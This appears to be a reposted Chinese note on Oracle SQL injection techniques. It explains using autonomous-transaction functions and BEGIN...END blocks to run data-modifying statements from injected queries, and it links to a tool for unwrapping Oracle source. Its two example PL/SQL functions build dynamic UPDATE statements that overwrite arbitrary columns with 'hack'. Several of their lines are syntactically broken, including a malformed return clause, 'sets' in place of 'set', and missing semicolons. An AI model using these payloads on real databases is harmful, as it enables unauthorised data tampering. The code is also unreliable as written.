1. 查询语句后只能直接调用函数,不能直接调用存储过程,例如:select function() from dual可以,select procedure() from dual不行;
2. 查询语句中无法执行DML或DDL操作,也就是说如果被调用的函数里有insert、update、delete、create之类的写操作,就会报错,除非函数被声明为自治事务,关键字PRAGMA AUTONOMOUS_TRANSACTION;
create or replace function funinject(ftable varchar2, fcol varchar2) return pragma autonomous_transaction; my_sql varchar2(1000); begin my_sql := 'update '|| ftable || ' sets '|| fcol ||'=''hack'''; execute immediate my_sql; commit; return 'inject' end funinject
3. 如果函数中有insert、update、delete、create之类的写操作,则只能注入到insert、update、delete之类的子查询里,例如:insert into table values(1,select function() from dual);
4. Oracle不能注入多语句,除非被注入的sql动态语句在begin和end之间例如:
create or replace function funinjecting(ftable varchar2, fcol varchar2) return varchar2 is my_sql varchar2(1000); begin my_sql := 'begin update '|| ftable || ' set '||fcol||'=''hack'';end;'; execute immediate my_sql; return 'inject' end funinjecting
unwrap Oracle sql源码的工具
http://yun.baidu.com/s/1kTgP2SZ
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 dio@foxmail.com 举报,一经查实,本站将立刻删除。
